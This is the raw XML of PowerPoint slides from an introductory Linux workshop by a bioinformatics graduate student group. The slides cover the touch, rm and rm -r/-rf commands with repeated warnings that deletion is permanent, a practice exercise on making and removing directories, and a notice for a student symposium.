        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="165385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BCBGSO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bioinformatics and Computational Biology Graduate Student Organization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Interested in collaborating with a computational biologist/bioinformatician? Contact </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>BCBLab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>bcbgso@iastate.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Upcoming events:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>BCBGSO Student Symposium – March 31</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="30000" dirty="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Reiman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Gardens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Event includes poster sessions, speakers from around the country, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2392077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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Create a file with Touch</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Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>touch &lt;file-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What it does:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;file-name&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>already exists, it changes the file timestamps.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;file-name&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>DOES NOT already exist, it creates an empty file called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;file-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1573864" y="4286118"/>
            <a:ext cx="5996271" cy="1755958"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3764742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Remove</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825624"/>
            <a:ext cx="4737829" cy="4755057"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>BE VERY, VERY CAREFUL WHEN USING REMOVE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>extremely</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> powerful.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you delete something, the machine doesn’t ask you if you’re sure you want to delete it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The file doesn’t go to a Recycle Bin.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It is GONE.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5539665" y="2239105"/>
            <a:ext cx="3337245" cy="1655001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="956638" y="4574745"/>
            <a:ext cx="6825990" cy="1325297"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3033077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Remove File</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> &lt;file-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What it does: Permanently deletes &lt;file-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2362200" y="3623169"/>
            <a:ext cx="4419600" cy="1800225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3561086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Remove Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rm</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r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;directory-name&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What it does: Permanently deletes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;directory-name&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, and all files contained in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;directory-name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>In order to NOT be asked if you want to delete each and every file in the directory, use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rm</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rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;directory-name&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2293065" y="4559849"/>
            <a:ext cx="4557869" cy="1752050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32620076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Lesson 2.3: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Warning about Remove</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="Image result for unix philosophy"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="6170" t="22893" r="6254" b="22580"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2564969" y="2787091"/>
            <a:ext cx="4014061" cy="18744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61294" y="6250899"/>
            <a:ext cx="7021409" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNIX will do EXACTLY what you tell it to do. Be very, very careful with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="673032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851"/>
            <a:ext cx="7886700" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exercise 2: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Making (and Breaking) Memories</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1390914"/>
            <a:ext cx="7886700" cy="4964919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Goals:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Make a directory called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Change directory to your newly-created </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Make a directory called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Make all the directories in the path:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bcbgso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/basic/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/workshop</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Can you do this without changing directories?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Make a file called “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memories.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>workshop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> directory. Can you do this without changing directories?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Remove “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>memories.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>” without changing directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Remove the directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bcbgso</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Hints:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Remember that removing a directory is slightly different from removing a file!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
